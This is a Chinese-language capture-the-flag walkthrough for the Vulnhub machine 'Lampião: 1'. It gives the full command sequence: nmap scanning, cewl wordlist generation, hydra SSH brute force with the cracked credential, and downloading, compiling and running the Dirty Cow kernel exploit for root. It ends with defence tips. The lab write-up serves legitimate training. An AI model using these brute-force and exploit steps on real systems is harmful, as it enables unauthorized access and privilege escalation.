Vulnhub-Lampião: 1 通关指南
字数 1153 2025-08-29 08:32:24
Vulnhub-Lampião: 1 渗透测试通关教学指南
靶机概述
- 名称: Lampião: 1
- 难度: 简单(Easy)
- 目标: 获取root权限并找到flag
- 背景: 以巴西著名土匪领袖Lampião为名的渗透测试靶机
信息收集阶段
网络扫描
-
确定靶机IP:
netdiscover -
全面端口扫描:
nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.11.131-n: 禁用DNS解析-v: 详细输出-Pn: 跳过主机发现-p-: 扫描所有端口(1-65535)-A: 启用操作系统检测和版本检测--reason: 显示端口状态原因-oN: 输出到文件
-
扫描结果分析:
- 22端口: SSH服务
- 80端口: HTTP服务(仅显示字符画)
- 1898端口: Drupal CMS
漏洞利用阶段
80端口分析
- 仅显示字符画,包含"fi duma egud?"字样
- 无其他有用信息
1898端口(Drupal)利用
-
初始尝试:
- 尝试使用Drupal 7.x PHP filter模块getshell
- 发现注册功能不可用(激活邮件无法发送)
-
替代方案:
- 使用cewl工具生成字典
cewl -w dict.txt http://192.168.11.131:1898/?q=node/1- 发现两个潜在用户名: tiago和eder
-
SSH爆破:
hydra -L usernames.txt -P dict.txt -t 4 ssh://192.168.11.131-L: 指定用户名列表-P: 指定密码字典-t: 线程数- 成功获取凭证: tiago:virgulino
权限提升
-
系统信息收集:
uname -a lsb_release -a- 内核版本: 4.4.0-31-generic
- 系统版本: Ubuntu 14.04.5 LTS (Trusty)
-
漏洞检测:
wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x /tmp/linux-exploit-suggester.sh /tmp/linux-exploit-suggester.sh- 发现Dirty Cow(CVE-2016-5195)漏洞可用
-
利用Dirty Cow提权:
wget -q -O /tmp/40847.cpp https://www.exploit-db.com/download/40847.cpp g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil ./dcow -s- 成功获取root权限
获取Flag
-
查找flag:
cat /root/flag.txt- 显示: 9740616875908d91ddcdaa8aea3af366
-
验证flag:
md5sum /var/www/html/lampiao.jpg- 确认flag为图片的MD5值
- 图片内容为Lampião的肖像
工具与技术总结
-
信息收集工具:
- netdiscover: 发现网络主机
- nmap: 全面端口扫描
-
密码爆破工具:
- cewl: 从网页生成字典
- hydra: SSH爆破
-
权限提升技术:
- 内核漏洞利用(Dirty Cow)
- linux-exploit-suggester: 自动检测可用漏洞
-
关键技巧:
- 全面端口扫描的重要性(-p-参数)
- 从网页内容生成字典
- 系统信息收集与漏洞匹配
防御建议
-
系统层面:
- 及时更新内核和安全补丁
- 禁用不必要的服务
-
Drupal安全:
- 保持CMS更新
- 限制用户注册功能
-
SSH安全:
- 禁用密码认证,使用密钥认证
- 限制登录尝试次数
- 使用强密码策略
-
权限管理:
- 遵循最小权限原则
- 定期审计用户权限
通过本案例,我们学习了从信息收集到权限提升的完整渗透测试流程,特别是针对老旧系统的内核漏洞利用技术。